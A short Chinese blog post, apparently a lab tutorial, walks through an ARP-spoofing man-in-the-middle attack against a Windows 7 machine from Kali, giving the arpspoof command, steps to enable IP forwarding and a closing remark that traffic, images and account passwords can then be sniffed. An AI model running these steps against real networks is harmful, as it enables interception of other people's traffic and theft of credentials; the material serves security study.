欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

arp欺骗

程序员文章站 2022-05-16 20:52:16
...

原理:在内网中,是受害者相信你的设备是网关设备,使网关设备相信你的设备是受害者。

实验步骤(需要了解arp协议)

受害者w7: 192.168.208.129 00-0c-29-0c-6b-bf
攻击者(kali): 192.168.208.128 00-0c-29-87-c2-13
网关 : 192.168.208.2 00-50-56-e7-89-f5

1、 kali中运行:arpspoof -t 192.168.208.129 -r 192.168.208.2

这条命令是利用arpspoof工具执行欺骗过程。(手动实现需要利用可以编辑的抓包工具,对目标主机的广播信息的reply包进行编辑不停发送即可。手动麻烦还需要配置其他回应信息)

kali:

arp欺骗

wp7:

arp欺骗
(以上可以抓包查看)

2、开启kali转发ip数据包功能:

修改/proc/sys/net/ipv4/ip_forward 为1

echo 1 > /proc/sys/net/ipv4/ip_forward
arp欺骗
!!!此文件如果修改了,wp7若还无法上网,继续尝试修改以下文件:

# 在 /etc/sysctl.conf文件中添加
net.ipv4.ip_forward=1
# 事后执行 sysctl -p
# 若还不行,在修改/usr/lib/sysctl.d/50-default.conf文件,加入
net.ipv4.ip_forward = 1 
# 到这一步应该是都可以的,还不行重启试试。

arp欺骗

3、嗅探:

现在就可以为所欲为了(arpspoof要一直跑)。。。可以抓包分析或利用嗅探工具,比如说:
arp欺骗
很多安全工具都可以利用,只要有信息流都可以按照特征抓取,比如图片、音频、账号密码等。